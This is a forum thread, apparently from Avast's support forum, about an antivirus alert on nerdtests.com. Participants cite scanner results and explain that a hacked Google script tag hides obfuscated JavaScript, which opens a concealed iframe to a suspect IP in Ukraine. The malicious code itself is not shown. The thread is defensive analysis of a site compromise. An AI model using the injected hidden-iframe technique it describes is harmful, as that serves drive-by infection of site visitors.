Nerdtests and Avast: Probably F/P?

So today I tried to open this site but avast thinks there is a trojan. I’m using the Avast 5 but I didn’t get the alarm when I was using version 4. Also Avast sends an alarm if you type the URL to the google. Also my friend said that he got an alert with Avast 5.

VirusTotal - nerdtests.com.htm - 4/41
http://www.virustotal.com/analisis/cfeaba2eb3758ea4391bf7d660c46988b158ff2e4d55fa98adf6122fdc4cf4d5-1278531118

This page seems to be 1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.nerdtests.com

NoVirusThanks - 3/16 - INFECTED
http://scanner.novirusthanks.org/analysis/8f4cbf447ed17e0c695a7846d4c1cc68/aW5kZXg=/

Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=a87ad2e60b4d1f2e09c65aea9d65e5ab&t=1278531513&type=js

There appears to be one of the google script tags which has been hacked (2nd to last on the page code, see image1), inserting a long line of obfuscated javascript.

This script when decoded (image2) is creating a hidden iframe tag that tries to open an IP in the Ukraine and highly suspect.

So I believe that the detection is good.

Hi DavidR,

And what does that long unescape string do? Well. that is hexadecimal coded javascript commands that are decoded according to lines as :
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus

What it does is shown in the last image and what I said in the post (which seems to differs from your example), creates a hidden iframe and connects to an IP in the Ukraine. After that I don’t care what it does, just that avast has in my mind done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj])

Even if your explanation is right it is still a good detection by avast, I just don’t go to any depth when I find what I consider is enough evidence to confirm a good detection.

You’ve received a blog article.
Congratulations :slight_smile:

http://blog.avast.com/2010/07/07/are-you-a-nerd/

Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D